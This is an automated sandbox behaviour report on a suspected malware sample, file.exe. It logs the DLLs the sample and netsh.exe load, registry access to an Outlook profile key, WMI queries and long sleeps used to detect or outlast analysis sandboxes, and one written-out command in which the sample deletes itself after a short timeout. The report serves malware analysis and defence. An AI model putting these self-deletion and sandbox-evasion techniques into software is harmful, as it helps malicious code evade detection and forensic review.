      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: file.exeStatic PE information: 0xE7D68599 [Fri Apr 3 11:16:41 2093 UTC]
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E73FBB push ebx; iretd 0_2_00007FF848E7400A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E600BD pushad ; iretd 0_2_00007FF848E600C1
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E7403D push ebx; iretd 0_2_00007FF848E7400A

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Users\user\Desktop\file.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
      Source: C:\Users\user\Desktop\file.exeProcess created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"Jump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2067C1F0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2067DD90000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599890Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599781Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599672Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599562Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599453Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599343Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599234Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599125Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599015Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598906Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598797Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598684Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598570Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 598401Jump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1840Jump to behavior
      Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2550Jump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -599890s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -599781s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -599672s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -599562s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -599453s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -599343s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -599234s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -599125s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -599015s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -598906s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -598797s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -598684s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -598570s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep time: -598401s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599890Jump to behavior
      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 599781Jump to behavior
